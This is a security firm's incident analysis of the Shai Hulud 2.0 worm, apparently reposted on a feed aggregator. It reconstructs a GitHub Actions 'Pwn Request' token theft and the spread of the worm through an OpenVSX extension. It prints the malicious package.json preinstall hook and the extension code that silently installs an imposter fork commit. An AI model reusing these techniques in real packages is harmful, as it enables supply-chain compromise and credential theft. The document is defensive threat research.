惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

N
News and Events Feed by Topic
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
月光博客
月光博客
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
大猫的无限游戏
大猫的无限游戏
T
Tailwind CSS Blog
S
SegmentFault 最新的问题
V
V2EX
阮一峰的网络日志
阮一峰的网络日志
C
Cisco Blogs
博客园 - 叶小钗
P
Privacy International News Feed
Jina AI
Jina AI
Apple Machine Learning Research
Apple Machine Learning Research
T
Threatpost
IT之家
IT之家
博客园 - 聂微东
Know Your Adversary
Know Your Adversary
Help Net Security
Help Net Security
罗磊的独立博客
I
Intezer
S
Schneier on Security
博客园_首页
C
CERT Recently Published Vulnerability Notes
雷峰网
雷峰网
Cisco Talos Blog
Cisco Talos Blog
宝玉的分享
宝玉的分享
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Webroot Blog
Webroot Blog
TaoSecurity Blog
TaoSecurity Blog
MyScale Blog
MyScale Blog
P
Privacy & Cybersecurity Law Blog
T
The Exploit Database - CXSecurity.com
PCI Perspectives
PCI Perspectives
Security Latest
Security Latest
H
Heimdal Security Blog
S
Secure Thoughts
Hacker News: Ask HN
Hacker News: Ask HN
Y
Y Combinator Blog
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Microsoft Security Blog
Microsoft Security Blog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
SecWiki News
SecWiki News
The GitHub Blog
The GitHub Blog
A
Arctic Wolf
A
About on SuperTechFans
aimingoo的专栏
aimingoo的专栏
T
Threat Research - Cisco Blogs
Engineering at Meta
Engineering at Meta
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC

Aikido Security's Blog

Axios CVE-2026-40175: a critical bug that’s… not exploitable GlassWorm goes native: New Zig dropper infects every IDE on your machine Aikido Attack finds multiple 0-days in Hoppscotch The cybersecurity doomerism around Mythos doesn't match what we see on the ground axios compromised on npm: maintainer account hijacked, RAT deployed Popular telnyx package compromised on PyPI by TeamPCP Aikido × Lovable: Vibe, Fix, Ship CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran TeamPCP deploys CanisterWorm on NPM following Trivy compromise Security testing is validating software that no longer exists Aikido Recognized by Frost & Sullivan with the 2026 Customer Value Leadership Award in ASPM GlassWorm Hides a RAT Inside a Malicious Chrome Extension fast-draft Open VSX Extension Compromised by BlokTrooper Glassworm Strikes Popular React Native Phone Number Packages Glassworm Is Back: A New Wave of Invisible Unicode Attacks Hits Hundreds of Repositories How Security Teams Fight Back Against AI-Powered Hackers Introducing Betterleaks, an open source secrets scanner by the author of Gitleaks Trump’s 2026 cybersecurity strategy: From compliance to consequence How does AI pentesting work with compliance? What continuous pentesting actually requires Rare Not Random: Using Token Efficiency for Secrets Scanning Persistent XSS/RCE using WebSockets in Storybook’s dev server Why Determinism Is Still a Necessity in Security WAF vs. RASP vs. ADR Introducing Aikido Infinite: A new model of self-securing software How Aikido secures AI pentesting agents by design Astro Full-Read SSRF via Host Header Injection How to Get Your Board to Care About Security (Before a Breach Forces the Issue) What is Slopsquatting? The AI Package Hallucination Attack Already Happening SvelteSpill: A Cache Deception Bug in SvelteKit + Vercel Top 6 Wiz Code Alternatives Aikido recognized as Platform Leader in Latio Tech's 2026 Application Security Report From detection to prevention: How Zen stops IDOR vulnerabilities at runtime npm backdoor lets hackers hijack gambling outcomes Introducing Upgrade Impact Analysis: When breaking changes actually matter to your code Why Trying to Secure OpenClaw is Ridiculous Claude Opus 4.6 found 500 vulnerabilities. What does this change for software security? Introducing Aikido Expansion Packs: Safer defaults inside the IDE International AI Safety Report 2026: What It Means for Autonomous AI Systems Self-Securing Software: What It Is, Why It Matters, and How It Works npx Confusion: Packages That Forgot to Claim Their Own Name What Is Continuous Pentesting? Introducing Aikido Package Health: a Better Way to Trust Your Dependencies AI Pentesting: Minimum Safety Requirements for Security Testing Secure SDLC for Engineering Teams (+ Checklist) Fake Clawdbot VS Code Extension Installs ScreenConnect RAT G_Wagon: npm Package Deploys Python Stealer Targeting 100+ Crypto Wallets Gone Phishin': npm Packages Serving Custom Credential Harvesting Pages Malicious PyPI Packages spellcheckpy and spellcheckerpy Deliver Python RAT Top 10 AI Security Tools For 2026 Agent Skills Are Spreading Hallucinated npx Commands Understanding Open-Source License Risk in Modern Software The CISO Vibe Coding Checklist for Security Top 6 Graphite alternatives for AI code review in 2026 From “No Bullsh*t Security” to $1B: We Just Raised Our $60m Series B Critical n8n Vulnerability Allows Unauthenticated Remote Code Execution (CVE-2026-21858) Top 14 VS Code Extensions for 2026 AI-Driven Pentesting of Coolify: Seven CVEs Identified Top Continuous Pentesting Tools in 2026 SAST vs SCA: Securing the Code You Write and the Code You Depend On JavaScript, MSBuild, and the Blockchain: Anatomy of the NeoShadow npm Supply-Chain Attack How Engineering and Security Teams Can Meet DORA’s Technical Requirements IDOR Vulnerabilities Explained: Why They Persist in Modern Applications Shai Hulud strikes again - The golden path MongoBleed: MongoDB Zlib Vulnerability (CVE-2025-14847) and How to Fix It First Sophisticated Malware Discovered on Maven Central via Typosquatting Attack on Jackson The Fork Awakens: Why GitHub’s Invisible Networks Break Package Security Top 10 Cyber Security Tools For 2026 SAST in the IDE is now free: Moving SAST to where development actually happens AI Pentesting in Action: A TL;DV Recap of Our Live Demo The Top 7 Threat Intelligence Tools in 2026 React & Next.js DoS Vulnerability (CVE-2025-55184): What You Need to Fix After React2Shell OWASP Top 10 for Agentic Applications (2026): What Developers and Security Teams Need to Know DAST vs Pentesting v AI Pentesting: Why DAST Cannot Replace Modern Pentesting PromptPwnd: Prompt Injection Vulnerabilities in GitHub Actions Using AI Agents Top 7 Cloud Security Vulnerabilities Critical React & Next.js RCE Vulnerability (CVE-2025-55182): What You Need to Fix Now How to Comply With the UK Cybersecurity & Resilience Bill: A Practical Guide for Modern Engineering Teams SCA Everywhere: Scan and Fix Open-Source Dependencies in Your IDE Safe Chain now enforces a minimum package age before install Shai Hulud Attacks Persist Through GitHub Actions Vulnerabilities Shai Hulud Launches Second Supply-Chain Attack: Zapier, ENS, AsyncAPI, PostHog, Postman Compromised CORS Security: Beyond Basic Configuration Revolut Selects Aikido Security to Power Developer-First Software Security The Future of Pentesting Is Autonomous How Aikido and Deloitte are bringing developer-first security to enterprise Secrets Detection: A Practical Guide to Finding and Preventing Leaked Credentials Invisible Unicode Malware Strikes OpenVSX, Again AI as a Power Tool: How Windsurf and Devin Are Changing Secure Coding Building Fast, Staying Secure: Supabase’s Approach to Secure-by-Default Development OWASP Top 10 2025: Official List, Changes, and What Developers Need to Know Top 10 JavaScript Security Vulnerabilities in Modern Web Apps The Return of the Invisible Threat: Hidden PUA Unicode Hits GitHub repositorties Top 7 Black Duck Alternatives in 2026 What Is IaC Security Scanning? Terraform, Kubernetes & Cloud Misconfigurations Explained AutoTriage and the Swiss Cheese Model of Security Noise Reduction Top Software Supply Chain Security Vulnerabilities Explained The Top 7 Kubernetes Security Tools Top 10 Web Application Security Vulnerabilities Every Team Should Know What Is CSPM (and CNAPP)? Cloud Security Posture Management Explained
Shai Hulud 2.0: What the Unknown Wonderer Tells Us About the Attackers’ Endgame
2025-12-02 · via Aikido Security's Blog

The story of Shai Hulud 2.0 contains more twists and turns, which we want to highlight, as we’ve seen it migrate into multiple ecosystems for the first time. In the process of exploring this, we have uncovered significant new information that provides deeper insights into the steps the attackers took. Here are a few highlights of our findings:

  • The first spread of the worm started already on 23 November 2025, 23:36 UTC, when the attackers deployed a malicious version of the asyncapi/asyncapi-preview extension on OpenVSX.
  • During the first strike of this attack, the attackers renamed their GitHub account to UnknownWonderer1

When I’ve spoken with journalists about the S1ngularity and Shai Hulud incidents, the big unanswered question has always been: what’s the attacker’s endgame? For months, we haven’t had much to work with, just guesses and intuition.

But this tiny lore-inspired detail actually reinforces a theory I’ve heard from lots of researchers: that these attackers aren’t just causing chaos for fun or profit. They’re also trying to send a message. It’s the kind of “look how fragile your world really is” energy that crops up when someone thinks the ecosystem has become too trusting, too automated, and too easy to slip through.

Whether that’s genuine motivation or just theatrical self-image doesn’t really matter. The result is the same: an attack designed not only to spread, but to make us confront the uncomfortable truth that we’ve grown a bit too confident in systems that are far more brittle than we’d like to believe.

The username UnknownWonderer1 is almost certainly a reference to the Zensunni Wanderers from Dune. These were nomadic people who spent millennia drifting across worlds, displaced and largely unnoticed by the powerful.

Over time, those wanderers became the Fremen; the only culture truly in tune with Shai-Hulud, the great sandworms of Arrakis. When you pair that with malware literally named Shai Hulud, the reference stops looking accidental. It becomes a bit of Dune-inspired symmetry: the wanderer moving above the sands and the worm tunneling quietly beneath them.

In Dune lore, the Zensunni represent people who live outside official structures, overlooked until the moment their resilience reshapes entire civilizations. It’s not hard to see why that imagery might appeal to an attacker slipping through a modern software supply chain.

By adopting this identity, the attackers cast themselves as a similarly unseen presence in the ecosystem, drifting between repositories, accounts, and packages without attracting attention.

That framing even hints at possible motivation. It suggests someone who sees themselves as an outsider challenging a system they consider fragile or complacent, or perhaps a wanderer revealing weaknesses in an environment that underestimated them.

And the metaphor fits uncannily well with the malware’s behavior: quiet, persistent, and operating from the blind spots nobody thinks to check. All of which makes the username feel less like a random choice and more like a glimpse into how the attackers imagine their role and impact. This proverb, attributed to The Zensunni Whip, seems somehow relevant, and foreshadowing:

You cannot manipulate a marionette with only one string

Spreading into OpenVSX

On 23 November 2025, 23:36 UTC, a new version of the asyncapi/asyncapi-preview extension on OpenVSX was published, which would install the Shai Hulud 2.0 worm. The way it was introduced was very sneaky and worth exploring in more depth. Here’s a step-by-step overview of how the attack unfolded. 

Step 1 - Prepare exfiltration fork

On 22 November 2025, 16:06 UTC, the attacker vskpsfkbjs on GitHub created a commit in a fork of the asyncapi/cli repository. 

https://github.com/asyncapi/cli/commit/9cbab46335c4c3fef2800a72ca222a44754e3ce1

Within it, we see them modify a script used by one of their GitHub actions, making it exfiltrate the local git config to a webhook.site endpoint. 

Do you notice that it says it belongs to a fork outside of the repository? This is important. Because this is a classic example of a “Pwn Request”. It will reside solely in the attacker fork of the repository, but later it will execute from within the asyncapi repository.

Step 2 - Prepare attack PR 

Next, on 22 November 2025, at 16:29 UTC, we see the attacker creating a branch in their fork called patch-1

https://github.com/asyncapi/cli/commit/6473466dd512125032cf2f8a28f391f8722d4901

There are a few things worth mentioning here:

  • Notice that the username has changed from vskpsfkbjs to UnknownWonderer1. It appears that the attacker renamed their GitHub account. 
  • The commit only appears to contain text changes.

That’s confusing, right? Why just text changes? The answer lies in how the GitHub actions workflow runs. Because the vulnerable GitHub actions check out the code being merged in from the fork, they will also pull in the malicious version of the file ‎.github/workflows/changeset-utils/index.js, which the attackers had already prepared with their exfiltration payload. This malicious file will then run within the context of the official repository, exfiltrating their GitHub secrets. 

Step 3 - Submit exfiltration PR

Up next, on 22 November 2025 at 16:38 UTC, the attacker submits a PR to the official repository to trigger their exfiltration payload. We see evidence of this in the SonarQube cloud history:

https://sonarcloud.io/summary/new_code?id=asyncapi_cli&pullRequest=1903

At this point, their malicious payload will have run and sent the GitHub token to their exfiltration point.

Step 4 - Hide evidence

At this point, the attacker will have exfiltrated the GitHub tokens for the repository. Just 2 minutes and 44 seconds later, at 16:40 UTC, they closed their pull request to hide their tracks. 

Step 5 - Deploy worm

The next day, on 23 November 2025, at 22:56 UTC, the attackers created a commit (likely on their fork) that appears to have been authored by GitHub Actions. The commit deletes all files in the repository except package.json and adds the worm. 

https://github.com/asyncapi/cli/commit/2efa4dff59bc3d3cecdf897ccf178f99b115d63d

The package.json file is changed to run the worm simply:

{
  "name": "asyncapi-utility",
  "version": "1.0.0",
  "bin": { "asyncapi-utility": "setup_bun.js" },
  "scripts": {
    "preinstall": "node setup_bun.js"
  },
  "license": "MIT"
}

Step 6 - Deploy malicious OpenVSX extension

Finally, the malicious OpenVSX extension was deployed on 23 November 2025, 23:36 UTC. Here’s the malicious code they inserted in the activation code for the extension:

  console.log("Congratulations, your extension \"asyncapi-preview\" is now active!");
      try {
        0;
        const e = a.spawn("npm", ["install", "github:asyncapi/cli#2efa4dff59bc3d3cecdf897ccf178f99b115d63d"], {
          detached: true,
          stdio: "ignore"
        });
        if ("function" == typeof e.unref) {
          e.unref();
        }
        e.on("error", e => {});
      } catch (e) {}

This doesn’t look that suspicious, does it? It seems to be as simple as installing the AsyncAPI CLI package from a specific commit in the official repository, which should be safe. But it’s not. It’s referring to the malicious commit above, which existed in a fork, not the official repository. Confused yet? 

Commit confusion? Repository confusion? 

When we first saw the “malicious” code above, we were flabbergasted. How could it be unsafe to install a package from a legitimate GitHub repository? The answer is Imposter Commits, a little-known property of GitHub. You see, when somebody forks a repository on GitHub, any commits in the fork can also be accessed by the commit hash through the original repository. It’s only by viewing the commit in the GitHub UI that you get an indication that something is off:

This behavior is really counterintuitive and not very security-friendly. Because when you run a command like npm install asyncapi/cli#2efa4dff59bc3d3cecdf897ccf178f99b115d63d, you expect it to install code from the asyncapi/cli repository. Not a commit on a fork that doesn’t even exist anymore. This type of attack could be considered a Repository Confusion vulnerability. 

Appendix - Detailed GitHub timeline

Timestamp (UTC) Δ Time Phase Action Significance
16:06:02 Reconnaissance Created fix-typos branch on personal fork Initial setup; user prepares working branch
16:06:27 +0:25 Reconnaissance PR #1 created on fork (inferred from comment data) Testing PR workflow on own repository
16:07:16 +0:49 Testing Closed PR #1 on fork Experimenting with PR mechanics
16:08:25 +1:09 Testing Reopened PR #1 on fork Continued workflow testing
16:09:06 +0:41 Testing Push to master branch Direct push to fork's master
16:09:21 +0:15 Testing Closed PR #1 again Finalizing test cycle
16:19:10 +9:49 Preparation Second push to master Syncing fork with changes
16:19:40 +0:30 Automation Trigger github-actions bot comments on PR Auto-changeset workflow activated
16:29:26 +9:46 Staging Push to new patch-1 branch Preparing payload for upstream submission
16:38:05 +8:39 Execution Opened PR #1903 on asyncapi/cli 🚨 Upstream contribution attempt
16:40:49 +2:44 Retreat PR #1903 closed by author Removing the PR to cover tracks